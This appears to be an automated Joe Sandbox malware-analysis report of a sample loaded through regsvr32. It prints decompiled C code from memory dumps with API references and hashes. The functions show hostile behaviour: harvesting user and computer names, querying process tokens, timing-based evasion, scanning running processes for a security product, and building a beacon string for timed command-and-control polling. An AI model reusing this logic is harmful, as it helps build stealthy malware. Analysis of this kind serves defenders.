0x001e44e7
0x001e44ed
0x001e44f7
0x001e44f9
0x001e44fe
0x001e450d
0x001e4511
0x001e451c
0x001e4523
0x001e452a
0x001e452a
0x001e4536
0x001e4536
0x001e4511
0x001e453f
0x001e4541
0x001e4544
0x001e4546
0x001e4549
0x001e454c
0x001e4556
0x001e455a
0x001e455e

APIs

GetUserNameW.ADVAPI32(00000000,001E55CE), ref: 001E448B
RtlAllocateHeap.NTDLL(00000000,001E55CE), ref: 001E44A2
GetUserNameW.ADVAPI32(00000000,001E55CE), ref: 001E44AF
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,001E55CE,?,?,?,?,?,001E6BD8,?,00000001), ref: 001E44D0
GetComputerNameW.KERNEL32(00000000,00000000), ref: 001E44F7
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001E450B
GetComputerNameW.KERNEL32(00000000,00000000), ref: 001E4518
HeapFree.KERNEL32(00000000,00000000), ref: 001E4536

Memory Dump Source

Source File: 00000003.00000002.581361082.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000003.00000002.581296737.00000000001E0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581561750.00000000001E9000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.581639255.00000000001EA000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581711524.00000000001EC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1e0000_regsvr32.jbxd

Similarity

API ID: HeapName$AllocateComputerFreeUser
String ID:
API String ID: 3239747167-0
Opcode ID: f0d3bc1300f0fd1fe0e85754b1b33438effa871f961b4c419698ce2437e0cd44
Instruction ID: 2c9781a5834cb307c1086ed8f5498f000ffa51d2d095f45fb9d8d58e75af15d7
Opcode Fuzzy Hash: f0d3bc1300f0fd1fe0e85754b1b33438effa871f961b4c419698ce2437e0cd44
Instruction Fuzzy Hash: 12313772A00689AFDB11DFAADC80B6EB7F9FF44310F514029E605EA660D730EE409B10

Uniqueness

Uniqueness Score: -1.00%

Function 001E2D06, Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 38%

			E001E2D06(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E001E6837(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E001E50CA(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}

0x001e2d13
0x001e2d14
0x001e2d15
0x001e2d16
0x001e2d17
0x001e2d1b
0x001e2d22
0x001e2d31
0x001e2d34
0x001e2d37
0x001e2d3e
0x001e2d41
0x001e2d44
0x001e2d47
0x001e2d4a
0x001e2d55
0x001e2d57
0x001e2d60
0x001e2d68
0x001e2d6a
0x001e2d7c
0x001e2d86
0x001e2d8a
0x001e2d99
0x001e2d9d
0x001e2da6
0x001e2dae
0x001e2dae
0x001e2db0
0x001e2db0
0x001e2db8
0x001e2dbe
0x001e2dc2
0x001e2dc2
0x001e2dcd

APIs

NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 001E2D4D
NtOpenProcessToken.NTDLL(00000000,00000008,00000000), ref: 001E2D60
NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 001E2D7C

Part of subcall function 001E6837: RtlAllocateHeap.NTDLL(00000000,00000000,001E4197), ref: 001E6843

NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 001E2D99
memcpy.NTDLL(00000000,00000000,0000001C), ref: 001E2DA6
NtClose.NTDLL(00000000), ref: 001E2DB8
NtClose.NTDLL(00000000), ref: 001E2DC2

Memory Dump Source

Source File: 00000003.00000002.581361082.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000003.00000002.581296737.00000000001E0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581561750.00000000001E9000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.581639255.00000000001EA000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581711524.00000000001EC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1e0000_regsvr32.jbxd

Similarity

API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
String ID:
API String ID: 2575439697-0
Opcode ID: ddd8d6fc62f38759fa70e60110d76fb52d22d120889cca5a40831299cafa2ec4
Instruction ID: 85cd5b06bb05fd6dd392088e8cf75487c3d1eafc0df877ea2604b7820c565699
Opcode Fuzzy Hash: ddd8d6fc62f38759fa70e60110d76fb52d22d120889cca5a40831299cafa2ec4
Instruction Fuzzy Hash: 552105B2900259BBDB01AFD5CC85DDEBFBDEF18B60F104062FA05EA160D7718A409BA0

Uniqueness

Uniqueness Score: -1.00%

Function 001E6B0F, Relevance: 10.6, APIs: 7, Instructions: 72
sleepmemorytimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 73%

			E001E6B0F(signed int __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				char _v32;
				long _v40;
				void* _t14;
				void* _t16;
				int _t18;
				signed int _t20;
				void* _t22;
				signed int _t23;
				intOrPtr _t25;
				unsigned int _t29;
				signed int _t33;
				signed int _t40;

				_t33 = __edx;
				_t14 = HeapCreate(0, 0x400000, 0); // executed
				 *0x1ea290 = _t14;
				if(_t14 != 0) {
					 *0x1ea180 = GetTickCount();
					_t16 = E001E4C1B(_a4);
					if(_t16 != 0) {
						L10:
						return _t16;
					} else {
						goto L3;
					}
					do {
						L3:
						GetSystemTimeAsFileTime( &_v12);
						_t18 = SwitchToThread();
						_t29 = _v12.dwHighDateTime;
						_t20 = (_t29 << 0x00000020 | _v12.dwLowDateTime) >> 7;
						_push(0);
						_push(9);
						_push(_t29 >> 7);
						_push(_t20);
						L001E7EEA();
						_t40 = _t18 + _t20;
						_t22 = E001E414A(_a4, _t40);
						_t23 = 2;
						Sleep(_t23 << _t40); // executed
					} while (_t22 == 1);
					_t25 =  *0x1ea2ac; // 0x2e0
					_v32 = 0;
					if(_t25 != 0) {
						__imp__(_t25,  &_v32);
						if(_t25 == 0) {
							_v40 = 0;
						}
						if(_v40 != 0) {
							 *0x1ea2b8 = 1; // executed
						}
					}
					_t16 = E001E53F2(_t33); // executed
					goto L10;
				}
				_t16 = 8;
				goto L10;
			}

0x001e6b0f
0x001e6b24
0x001e6b2c
0x001e6b31
0x001e6b44
0x001e6b49
0x001e6b50
0x001e6bd8
0x001e6bde
0x00000000
0x00000000
0x00000000
0x001e6b56
0x001e6b56
0x001e6b5b
0x001e6b61
0x001e6b67
0x001e6b71
0x001e6b75
0x001e6b76
0x001e6b7b
0x001e6b7c
0x001e6b7d
0x001e6b82
0x001e6b88
0x001e6b91
0x001e6b97
0x001e6b9d
0x001e6ba2
0x001e6ba9
0x001e6bad
0x001e6bb5
0x001e6bbd
0x001e6bbf
0x001e6bbf
0x001e6bc7
0x001e6bc9
0x001e6bc9
0x001e6bc7
0x001e6bd3
0x00000000
0x001e6bd3
0x001e6b35
0x00000000

APIs

HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 001E6B24
GetTickCount.KERNEL32 ref: 001E6B3B
GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001), ref: 001E6B5B
SwitchToThread.KERNEL32(?,00000001), ref: 001E6B61
_aullrem.NTDLL(?,?,00000009,00000000), ref: 001E6B7D
Sleep.KERNELBASE(00000002,00000000,?,00000001), ref: 001E6B97
IsWow64Process.KERNEL32(000002E0,?,?,00000001), ref: 001E6BB5

Memory Dump Source

Source File: 00000003.00000002.581361082.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000003.00000002.581296737.00000000001E0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581561750.00000000001E9000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.581639255.00000000001EA000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581711524.00000000001EC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1e0000_regsvr32.jbxd

Similarity

API ID: Time$CountCreateFileHeapProcessSleepSwitchSystemThreadTickWow64_aullrem
String ID:
API String ID: 3690864001-0
Opcode ID: 09410b7ca3c899c8c0036d31e2e2f0f61489690d4eaf1f126d042ca65768c3b9
Instruction ID: 699605a88b272214721f4dca1f36039d791535a2da10882365bcebf230525e28
Opcode Fuzzy Hash: 09410b7ca3c899c8c0036d31e2e2f0f61489690d4eaf1f126d042ca65768c3b9
Instruction Fuzzy Hash: B92105B2A04694AFC710DFA6DCC9A6E77DCEB643A0F80492DF505CB540E7709C848B62

Uniqueness

Uniqueness Score: -1.00%

Function 001E513E, Relevance: 7.5, APIs: 5, Instructions: 41
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E001E513E() {
				char _v264;
				void* _v300;
				void* _t5;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t5 = CreateToolhelp32Snapshot(2, 0); // executed
				_t17 = _t5;
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300); // executed
					while(_t8 != 0) {
						_t9 =  *0x1ea2d4; // 0x4c1d5a8
						_t2 = _t9 + 0x1ebdd4; // 0x73617661
						if(StrStrIA( &_v264, _t2) != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						FindCloseChangeNotification(_t17); // executed
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}

0x001e5149
0x001e514e
0x001e5153
0x001e5157
0x001e5161
0x001e5192
0x001e5168
0x001e516d
0x001e5183
0x001e519a
0x001e5185
0x001e518d
0x00000000
0x001e518d
0x001e519b
0x001e519c
0x00000000
0x001e519c
0x00000000
0x001e5196
0x001e51a2
0x001e51a7

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 001E514E
Process32First.KERNEL32(00000000,?), ref: 001E5161
StrStrIA.SHLWAPI(?,73617661,00000000,00000000), ref: 001E517B
Process32Next.KERNEL32(00000000,?), ref: 001E518D
FindCloseChangeNotification.KERNELBASE(00000000), ref: 001E519C

Memory Dump Source

Source File: 00000003.00000002.581361082.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000003.00000002.581296737.00000000001E0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581561750.00000000001E9000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.581639255.00000000001EA000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581711524.00000000001EC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1e0000_regsvr32.jbxd

Similarity

API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
String ID:
API String ID: 3243318325-0
Opcode ID: d6b00a70bdfad1236fdf7c9e5510a14d73003d418ace187c24acaa62f6e3fa46
Instruction ID: 0011dfbbdbd7587691ec2b0834fb5014e816b3b80ae02c6d101f8fd4e7b5696a
Opcode Fuzzy Hash: d6b00a70bdfad1236fdf7c9e5510a14d73003d418ace187c24acaa62f6e3fa46
Instruction Fuzzy Hash: 4AF02432201CA46AD720A7A78C89FEF73BDDFD4318F440161F945D7000EB309E868BA2

Uniqueness

Uniqueness Score: -1.00%

Function 001E46D1, Relevance: 33.3, APIs: 22, Instructions: 262
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E001E46D1(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a8, char** _a12, int* _a16, signed int _a20) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* __ebx;
				void* __edi;
				long _t63;
				intOrPtr _t64;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				void* _t71;
				intOrPtr _t72;
				int _t75;
				void* _t76;
				intOrPtr _t77;
				intOrPtr _t81;
				intOrPtr _t85;
				intOrPtr _t86;
				void* _t88;
				void* _t91;
				intOrPtr _t95;
				intOrPtr _t99;
				intOrPtr* _t101;
				void* _t102;
				void* _t107;
				intOrPtr _t111;
				signed int _t115;
				char** _t117;
				int _t120;
				signed int _t122;
				intOrPtr* _t123;
				intOrPtr* _t125;
				intOrPtr* _t127;
				intOrPtr* _t129;
				intOrPtr _t132;
				intOrPtr _t135;
				int _t138;
				intOrPtr _t139;
				int _t142;
				void* _t143;
				void* _t144;
				void* _t154;
				int _t157;
				void* _t158;
				void* _t159;
				void* _t160;
				intOrPtr _t161;
				void* _t163;
				long _t167;
				intOrPtr* _t168;
				intOrPtr* _t171;
				void* _t172;
				void* _t174;
				void* _t175;
				void* _t180;

				_t154 = __edx;
				_t144 = __ecx;
				_t63 = __eax;
				_t143 = _a20;
				_a20 = 8;
				if(__eax == 0) {
					_t63 = GetTickCount();
				}
				_t64 =  *0x1ea018; // 0xff401b7a
				asm("bswap eax");
				_t65 =  *0x1ea014; // 0x5cb11ae7
				asm("bswap eax");
				_t66 =  *0x1ea010; // 0x15dc9586
				asm("bswap eax");
				_t67 =  *0x1ea00c; // 0x8e03bf7
				asm("bswap eax");
				_t68 =  *0x1ea2d4; // 0x4c1d5a8
				_t3 = _t68 + 0x1eb613; // 0x74666f73
				_t157 = wsprintfA(_t143, _t3, 3, 0x3d15c, _t67, _t66, _t65, _t64,  *0x1ea02c,  *0x1ea004, _t63);
				_t71 = E001E6A09();
				_t72 =  *0x1ea2d4; // 0x4c1d5a8
				_t4 = _t72 + 0x1eb653; // 0x74707526
				_t75 = wsprintfA(_t157 + _t143, _t4, _t71);
				_t174 = _t172 + 0x38;
				_t158 = _t157 + _t75;
				if(_a8 != 0) {
					_t139 =  *0x1ea2d4; // 0x4c1d5a8
					_t8 = _t139 + 0x1eb65e; // 0x732526
					_t142 = wsprintfA(_t158 + _t143, _t8, _a8);
					_t174 = _t174 + 0xc;
					_t158 = _t158 + _t142;
				}
				_t76 = E001E5040(_t144);
				_t77 =  *0x1ea2d4; // 0x4c1d5a8
				_t10 = _t77 + 0x1eb302; // 0x6d697426
				_t159 = _t158 + wsprintfA(_t158 + _t143, _t10, _t76, _t154);
				_t81 =  *0x1ea2d4; // 0x4c1d5a8
				_t12 = _t81 + 0x1eb7aa; // 0x4e08d52
				_t180 = _a4 - _t12;
				_t14 = _t81 + 0x1eb2d7; // 0x74636126
				_t156 = 0 | _t180 == 0x00000000;
				_t160 = _t159 + wsprintfA(_t159 + _t143, _t14, _t180 == 0);
				_t85 =  *0x1ea31c; // 0x4e095e0
				_t175 = _t174 + 0x1c;
				if(_t85 != 0) {
					_t135 =  *0x1ea2d4; // 0x4c1d5a8
					_t18 = _t135 + 0x1eb8da; // 0x3d736f26
					_t138 = wsprintfA(_t160 + _t143, _t18, _t85);
					_t175 = _t175 + 0xc;
					_t160 = _t160 + _t138;
				}
				_t86 =  *0x1ea32c; // 0x4e095b0
				if(_t86 != 0) {
					_t132 =  *0x1ea2d4; // 0x4c1d5a8
					_t20 = _t132 + 0x1eb676; // 0x73797326
					wsprintfA(_t160 + _t143, _t20, _t86);
					_t175 = _t175 + 0xc;
				}
				_t161 =  *0x1ea37c; // 0x4e09630
				_t88 = E001E2885(0x1ea00a, _t161 + 4);
				_t167 = 0;
				_v12 = _t88;
				if(_t88 == 0) {
					L28:
					RtlFreeHeap( *0x1ea290, _t167, _t143); // executed
					return _a20;
				} else {
					_t91 = RtlAllocateHeap( *0x1ea290, 0, 0x800);
					_a8 = _t91;
					if(_t91 == 0) {
						L27:
						HeapFree( *0x1ea290, _t167, _v12);
						goto L28;
					}
					E001E2DD0(GetTickCount());
					_t95 =  *0x1ea37c; // 0x4e09630
					__imp__(_t95 + 0x40);
					asm("lock xadd [eax], ecx");
					_t99 =  *0x1ea37c; // 0x4e09630
					__imp__(_t99 + 0x40);
					_t101 =  *0x1ea37c; // 0x4e09630
					_t102 = E001E624D(1, _t156, _t143,  *_t101); // executed
					_t163 = _t102;
					_v20 = _t163;
					asm("lock xadd [eax], ecx");
					if(_t163 == 0) {
						L26:
						HeapFree( *0x1ea290, _t167, _a8);
						goto L27;
					}
					StrTrimA(_t163, 0x1e92ac);
					_push(_t163);
					_t107 = E001E21C1();
					_v8 = _t107;
					if(_t107 == 0) {
						L25:
						HeapFree( *0x1ea290, _t167, _t163);
						goto L26;
					}
					 *_t163 = 0;
					__imp__(_a8, _v12);
					_t168 = __imp__;
					 *_t168(_a8, _v8);
					_t111 = E001E4AA6( *_t168(_a8, _t163), _a8);
					_a4 = _t111;
					if(_t111 == 0) {
						_a20 = 8;
						L23:
						E001E1492();
						L24:
						HeapFree( *0x1ea290, 0, _v8);
						_t167 = 0;
						goto L25;
					}
					_t115 = E001E26C9(_t143, 0xffffffffffffffff, _t163,  &_v16); // executed
					_a20 = _t115;
					if(_t115 == 0) {
						_t171 = _v16;
						_t122 = E001E161A(_t171, _a4, _a12, _a16); // executed
						_a20 = _t122;
						_t123 =  *((intOrPtr*)(_t171 + 8));
						 *((intOrPtr*)( *_t123 + 0x80))(_t123);
						_t125 =  *((intOrPtr*)(_t171 + 8));
						 *((intOrPtr*)( *_t125 + 8))(_t125);
						_t127 =  *((intOrPtr*)(_t171 + 4));
						 *((intOrPtr*)( *_t127 + 8))(_t127);
						_t129 =  *_t171;
						 *((intOrPtr*)( *_t129 + 8))(_t129);
						E001E50CA(_t171);
					}
					if(_a20 != 0x10d2) {
						L18:
						if(_a20 == 0) {
							_t117 = _a12;
							if(_t117 != 0) {
								_t164 =  *_t117;
								_t169 =  *_a16;
								wcstombs( *_t117,  *_t117,  *_a16);
								_t120 = E001E580E(_t164, _t164, _t169 >> 1);
								_t163 = _v20;
								 *_a16 = _t120;
							}
						}
						goto L21;
					} else {
						if(_a12 != 0) {
							L21:
							E001E50CA(_a4);
							if(_a20 == 0 || _a20 == 0x10d2) {
								goto L24;
							} else {
								goto L23;
							}
						}
						_a20 = _a20 & 0x00000000;
						goto L18;
					}
				}
			}

0x001e46d1
0x001e46d1
0x001e46d1
0x001e46da
0x001e46df
0x001e46e6
0x001e46e8
0x001e46e8
0x001e46f5
0x001e4700
0x001e4703
0x001e470e
0x001e4711
0x001e4716
0x001e4719
0x001e471e
0x001e4721
0x001e472d
0x001e473a
0x001e473c
0x001e4742
0x001e4747
0x001e4752
0x001e4754
0x001e4757
0x001e475d
0x001e475f
0x001e4767
0x001e4772
0x001e4774
0x001e4777
0x001e4777
0x001e4779
0x001e4780
0x001e4785
0x001e4792
0x001e4794
0x001e4799
0x001e47a1
0x001e47a4
0x001e47aa
0x001e47b5
0x001e47b7
0x001e47bc
0x001e47c1
0x001e47c4
0x001e47c9
0x001e47d4
0x001e47d6
0x001e47d9
0x001e47d9
0x001e47db
0x001e47e2
0x001e47e5
0x001e47ea
0x001e47f4
0x001e47f6
0x001e47f6
0x001e47f9
0x001e4807
0x001e480c
0x001e4810
0x001e4813
0x001e49dd
0x001e49e5
0x001e49f2
0x001e4819
0x001e4825
0x001e482d
0x001e4830
0x001e49cd
0x001e49d7
0x00000000
0x001e49d7
0x001e483c
0x001e4841
0x001e484a
0x001e485b
0x001e485f
0x001e4868
0x001e486e
0x001e4876
0x001e487b
0x001e4882
0x001e488b
0x001e4891
0x001e49bd
0x001e49c7
0x00000000
0x001e49c7
0x001e489d
0x001e48a3
0x001e48a4
0x001e48ab
0x001e48ae
0x001e49af
0x001e49b7
0x00000000
0x001e49b7
0x001e48b7
0x001e48bd
0x001e48c6
0x001e48cf
0x001e48da
0x001e48e1
0x001e48e4
0x001e49f5
0x001e4997
0x001e4997
0x001e499c
0x001e49a7
0x001e49ad
0x00000000
0x001e49ad
0x001e48ee
0x001e48f5
0x001e48f8
0x001e48fd
0x001e4908
0x001e490d
0x001e4910
0x001e4916
0x001e491c
0x001e4922
0x001e4925
0x001e492b
0x001e492e
0x001e4933
0x001e4937
0x001e4937
0x001e4943
0x001e494f
0x001e4953
0x001e4955
0x001e495a
0x001e495c
0x001e4961
0x001e4966
0x001e4973
0x001e497b
0x001e497e
0x001e497e
0x001e495a
0x00000000
0x001e4945
0x001e4949
0x001e4980
0x001e4983
0x001e498c
0x00000000
0x00000000
0x00000000
0x00000000
0x001e498c
0x001e494b
0x00000000
0x001e494b
0x001e4943

APIs

GetTickCount.KERNEL32 ref: 001E46E8
wsprintfA.USER32 ref: 001E4735
wsprintfA.USER32 ref: 001E4752
wsprintfA.USER32 ref: 001E4772
wsprintfA.USER32 ref: 001E4790
wsprintfA.USER32 ref: 001E47B3
wsprintfA.USER32 ref: 001E47D4
wsprintfA.USER32 ref: 001E47F4
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001E4825
GetTickCount.KERNEL32 ref: 001E4836
RtlEnterCriticalSection.NTDLL(04E095F0), ref: 001E484A
RtlLeaveCriticalSection.NTDLL(04E095F0), ref: 001E4868

Part of subcall function 001E624D: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,001E70D9,00000000,04E09630), ref: 001E6278
Part of subcall function 001E624D: lstrlen.KERNEL32(00000000,?,00000000,001E70D9,00000000,04E09630), ref: 001E6280
Part of subcall function 001E624D: strcpy.NTDLL ref: 001E6297
Part of subcall function 001E624D: lstrcat.KERNEL32(00000000,00000000), ref: 001E62A2
Part of subcall function 001E624D: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,001E70D9,?,00000000,001E70D9,00000000,04E09630), ref: 001E62BF

StrTrimA.SHLWAPI(00000000,001E92AC,?,04E09630), ref: 001E489D

Part of subcall function 001E21C1: lstrlen.KERNEL32(04E087FA,00000000,00000000,00000000,001E7100,00000000), ref: 001E21D1
Part of subcall function 001E21C1: lstrlen.KERNEL32(?), ref: 001E21D9
Part of subcall function 001E21C1: lstrcpy.KERNEL32(00000000,04E087FA), ref: 001E21ED
Part of subcall function 001E21C1: lstrcat.KERNEL32(00000000,?), ref: 001E21F8

lstrcpy.KERNEL32(00000000,?), ref: 001E48BD
lstrcat.KERNEL32(00000000,?), ref: 001E48CF
lstrcat.KERNEL32(00000000,00000000), ref: 001E48D5

Part of subcall function 001E4AA6: lstrlen.KERNEL32(?,00000000,04E09C98,7742C740,001E13D0,04E09E9D,001E55DE,001E55DE,?,001E55DE,?,63699BC3,E8FA7DD7,00000000), ref: 001E4AAD
Part of subcall function 001E4AA6: mbstowcs.NTDLL ref: 001E4AD6
Part of subcall function 001E4AA6: memset.NTDLL ref: 001E4AE8

wcstombs.NTDLL ref: 001E4966

Part of subcall function 001E161A: SysAllocString.OLEAUT32(00000000), ref: 001E165B
Part of subcall function 001E161A: IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,00000000), ref: 001E16DD
Part of subcall function 001E161A: StrStrIW.SHLWAPI(00000000,006E0069), ref: 001E171C

Part of subcall function 001E50CA: RtlFreeHeap.NTDLL(00000000,00000000,001E4239,00000000,00000001,?,00000000,?,?,?,001E6B8D,00000000,?,00000001), ref: 001E50D6

HeapFree.KERNEL32(00000000,?,00000000), ref: 001E49A7
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001E49B7
HeapFree.KERNEL32(00000000,00000000,?,04E09630), ref: 001E49C7
HeapFree.KERNEL32(00000000,?), ref: 001E49D7
RtlFreeHeap.NTDLL(00000000,?), ref: 001E49E5

Memory Dump Source

Source File: 00000003.00000002.581361082.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000003.00000002.581296737.00000000001E0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581561750.00000000001E9000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.581639255.00000000001EA000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581711524.00000000001EC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1e0000_regsvr32.jbxd

Similarity

API ID: Heapwsprintf$Free$lstrlen$lstrcat$CountCriticalSectionTickTrimlstrcpy$AllocAllocateEnterInterface_LeaveProxyQueryStringUnknown_mbstowcsmemsetstrcpywcstombs
String ID:
API String ID: 2871901346-0
Opcode ID: a9b6e117133a8825de85761c783da3fa7b1d3e78d99428490289fbbabb9d14e3
Instruction ID: 5c71264a294f28030f3b6f6a9ff4bf936f8ab9cdbd89d65658f3a1e76fc5270d
Opcode Fuzzy Hash: a9b6e117133a8825de85761c783da3fa7b1d3e78d99428490289fbbabb9d14e3
Instruction Fuzzy Hash: 62A18971900589AFCB11DFA9DCC8E9F3BA9FF48354B554021F908DB621DB35A990CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 001E2022, Relevance: 16.6, APIs: 11, Instructions: 149
timememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E001E2022(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t61;
				long _t65;
				signed int _t66;
				long _t68;
				void* _t69;
				void* _t71;
				signed int _t72;
				intOrPtr _t74;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t74 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x1ea298);
					_v20 = 0;
					_v16 = 0;
					L001E7D8C();
					_v36.LowPart = _t46;
					_v32 = _t74;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0x1ea2c4; // 0x2dc
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x1ea2a4 = 5;
						} else {
							_t69 = E001E1AB8(_t74); // executed
							if(_t69 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0x1ea2b8 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t72 = _v12;
						_t58 = _t72 << 4;
						_t76 = _t80 + (_t72 << 4) - 0x54;
						_t73 = _t72 + 1;
						_v24 = _t72 + 1;
						_t61 = E001E5F9A( &_v20, _t73, _t76, _t73, _t80 + _t58 - 0x58, _t76,  &_v16); // executed
						_v8.LowPart = _t61;
						if(_t61 != 0) {
							goto L17;
						}
						_t66 = _v24;
						_t90 = _t66 - 3;
						_v12 = _t66;
						if(_t66 != 3) {
							goto L6;
						} else {
							_t68 = E001E3032(_t73, _t90,  &_v92, _a4, _a8); // executed
							_v8.LowPart = _t68;
						}
						goto L12;
						L17:
						__eflags = _t61 - 0x10d2;
						if(_t61 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x1ea29c);
							goto L21;
						} else {
							__eflags =  *0x1ea2a0; // 0xa
							if(__eflags == 0) {
								goto L12;
							} else {
								_t61 = E001E1492();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x1ea2a0);
								L21:
								L001E7D8C();
								_v36.LowPart = _t61;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
								_t65 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								__eflags = _t65;
								_v8.LowPart = _t65;
								if(_t65 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t71 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							HeapFree( *0x1ea290, 0, _t54);
						}
						_t78 =  &(_t78[4]);
						_t71 = _t71 - 1;
					} while (_t71 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}

0x001e2022
0x001e2034
0x001e2037
0x001e2043
0x001e204b
0x001e204e
0x001e21b4
0x001e2054
0x001e2054
0x001e2056
0x001e205b
0x001e205c
0x001e2062
0x001e2065
0x001e2068
0x001e2076
0x001e2081
0x001e2084
0x001e2086
0x001e2093
0x001e209d
0x001e20a1
0x001e20a4
0x001e20a9
0x001e20b4
0x001e20b4
0x001e20ab
0x001e20ab
0x001e20b2
0x00000000
0x00000000
0x001e20b2
0x001e20be
0x00000000
0x001e20c1
0x001e20c5
0x001e20d0
0x001e20d0
0x001e20d7
0x001e20dc
0x001e20e3
0x001e20ec
0x001e20f2
